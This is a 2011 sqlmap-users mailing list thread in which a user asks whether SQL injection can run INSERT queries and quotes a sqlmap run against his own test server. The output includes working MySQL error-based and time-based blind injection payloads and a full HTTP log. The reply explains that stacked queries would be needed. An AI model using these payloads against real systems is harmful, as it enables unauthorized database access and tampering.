Re: [sqlmap-users] insert via injection
From: Miroslav S. <mir...@gm...> - 2011-05-01 21:11:45
Hi Kirill. For something like this, stacked queries should be supported, while you can see from your injection info that there is no stacked injection vulnerability (as a command other than SELECT cannot be inserted into the vulnerable query).

kr

On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote:
> Hi,
> is it possible to make "insert/update" queries via SQL injection bugs?
> I tried on my test machine via "--sql-query", but I didn't see the query in
> request_uri:
>
> (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
> $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';"
>
>     sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [*] starting at: 21:07:53
>
> [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file
> [21:07:53] [INFO] resuming injection data from session file
> [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [21:07:53] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=1 AND SLEEP(5)
> ---
>
> [21:07:53] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux CentOS 5
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5.0
> do you want to retrieve the SQL statement output? [Y/n/a]
> [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';'
> [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> [21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
> insert into users set user='aaa',pass='bbb'; [2]:
> [*] None
>
> [21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60'
>
> [*] shutting down at: 21:07:54
>
> (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
> $ cat t3.log
> HTTP request [#1]:
> GET /sql/user.php?id=1 HTTP/1.1
> Accept-Encoding: identity
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 10.0.0.60
> Accept-language: en-us,en;q=0.5
> Pragma: no-cache
> Cache-control: no-cache,no-store
> User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> Connection: close
>
> HTTP response [#1] (200 OK):
> Content-length: 949
> X-powered-by: PHP/5.1.6
> Uri: http://10.0.0.60:80/sql/user.php?id=1
> Server: Apache/2.2.3 (CentOS)
> Connection: close
> Date: Tue, 26 Apr 2011 19:07:53 GMT
> Content-type: text/html; charset=UTF-8
>
> HTTP_ACCEPT_ENCODING => identity
> HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
> HTTP_CONNECTION => close
> HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
> HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
> HTTP_HOST => 10.0.0.60
> HTTP_PRAGMA => no-cache
> HTTP_CACHE_CONTROL => no-cache,no-store
> PATH => /sbin:/usr/sbin:/bin:/usr/bin
> SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address>
>
> SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
> SERVER_NAME => 10.0.0.60
> SERVER_ADDR => 10.0.0.60
> SERVER_PORT => 80
> REMOTE_ADDR => 10.0.0.60
> DOCUMENT_ROOT => /var/www/html
> SERVER_ADMIN => root@localhost
> SCRIPT_FILENAME => /var/www/html/sql/user.php
> REMOTE_PORT => 41083
> GATEWAY_INTERFACE => CGI/1.1
> SERVER_PROTOCOL => HTTP/1.1
> REQUEST_METHOD => GET
> QUERY_STRING => id=1
> REQUEST_URI => /sql/user.php?id=1
> SCRIPT_NAME => /sql/user.php
> PHP_SELF => /sql/user.php
> REQUEST_TIME => 1303844873
> ok
> ############################################################################
>
> --
> Kirill Morozov
> KIMO2-RIPE, RHCE
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B